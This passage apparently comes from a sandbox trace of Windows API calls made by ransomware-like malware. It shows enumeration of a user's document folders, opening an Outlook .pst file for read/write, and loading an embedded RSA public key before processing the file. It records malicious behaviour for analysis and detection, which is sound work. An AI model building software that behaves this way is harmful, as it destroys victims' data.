Size=0x830) returned 0x2d154b0 [0188.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0188.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0188.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.517] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\My Music\\") returned="My Music\\" [0188.517] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0188.517] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0188.517] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0188.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0188.517] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.517] PathFindFileNameW (pszPath="") returned="" [0188.518] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\My Music\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\my music\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2758f670, ftCreationTime.dwHighDateTime=0x1d89cf2, ftLastAccessTime.dwLowDateTime=0x6259e2c0, ftLastAccessTime.dwHighDateTime=0x1d8a5f8, ftLastWriteTime.dwLowDateTime=0x6259e2c0, ftLastWriteTime.dwHighDateTime=0x1d8a5f8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UHfBjIaC", cAlternateFileName="")) returned 0xffffffff [0188.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0188.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0188.518] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0188.519] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0188.519] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\My Pictures\\") returned="My Pictures\\" [0188.519] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0188.519] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0188.519] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0188.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0188.519] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.519] PathFindFileNameW (pszPath="") returned="" [0188.519] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\My Pictures\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\my pictures\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2758f670, ftCreationTime.dwHighDateTime=0x1d89cf2, ftLastAccessTime.dwLowDateTime=0x6259e2c0, ftLastAccessTime.dwHighDateTime=0x1d8a5f8, ftLastWriteTime.dwLowDateTime=0x6259e2c0, ftLastWriteTime.dwHighDateTime=0x1d8a5f8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UHfBjIaC", cAlternateFileName="")) returned 0xffffffff [0188.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0188.519] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0188.519] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0188.519] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\My Videos\\") returned="My Videos\\" [0188.519] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0188.519] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0188.520] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0188.520] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.520] PathFindFileNameW (pszPath="") returned="" [0188.520] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\My Videos\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\my videos\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2758f670, ftCreationTime.dwHighDateTime=0x1d89cf2, ftLastAccessTime.dwLowDateTime=0x6259e2c0, ftLastAccessTime.dwHighDateTime=0x1d8a5f8, ftLastWriteTime.dwLowDateTime=0x6259e2c0, ftLastWriteTime.dwHighDateTime=0x1d8a5f8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UHfBjIaC", cAlternateFileName="")) returned 0xffffffff [0188.520] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0188.520] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0188.520] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\") returned="Outlook Files\\" [0188.520] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0188.520] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0188.520] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0188.520] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.520] PathFindFileNameW (pszPath="") returned="" [0188.520] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\outlook files\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d6f7390, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x21e55d50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x21e55d50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0188.520] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d6f7390, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x21e55d50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x21e55d50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.521] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4d7697b0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x4d7697b0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3aa38830, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="franc@gdllo.de.pst", cAlternateFileName="FRANC@~1.PST")) returned 1 [0188.521] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\franc@gdllo.de.pst") returned=".pst" [0188.521] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\franc@gdllo.de.pst" (normalized: "c:\\users\\keecfmwgj\\documents\\outlook files\\franc@gdllo.de.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.521] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=271360) returned 1 [0188.521] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0188.523] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x423da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.523] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0188.524] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.525] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x25805, lpOverlapped=0x0) returned 1 [0188.641] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0188.642] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.642] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.642] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0188.916] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0188.917] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.917] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0188.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0188.917] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0188.917] GetLastError () returned 0x0 [0188.917] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0188.917] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0188.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0188.917] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0188.917] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0188.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0188.917] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0188.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0188.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0188.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x25810) returned 0x2d43778 [0188.918] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0188.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0188.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0188.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0188.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0188.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0188.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38f40 [0188.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39880 [0188.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38f88 [0188.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39898 [0188.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398c8 [0188.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39928 [0188.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398e0 [0188.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0188.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0188.919] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0188.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0188.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398c8 | out: hHeap=0x6a0000) returned 1 [0188.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398e0 | out: hHeap=0x6a0000) returned 1 [0188.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39928 | out: hHeap=0x6a0000) returned 1 [0188.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0188.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39928 [0188.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0188.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d398e0 [0188.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0188.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d398c8 [0188.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0188.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0188.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0188.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0188.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0188.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0188.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0188.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0188.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0188.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398e0 | out: hHeap=0x6a0000) returned 1 [0188.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0188.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398c8 | out: hHeap=0x6a0000) returned 1 [0188.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0188.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0188.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39928 | out: hHeap=0x6a0000) returned 1 [0188.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0188.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0188.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0188.923] GetCurrentThreadId () returned 0x264 [0188.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0188.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d38578 [0188.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0188.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0188.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0188.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0188.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0188.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0188.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.924] GetCurrentThreadId () returned 0x264 [0188.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0188.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.925] HeapFree 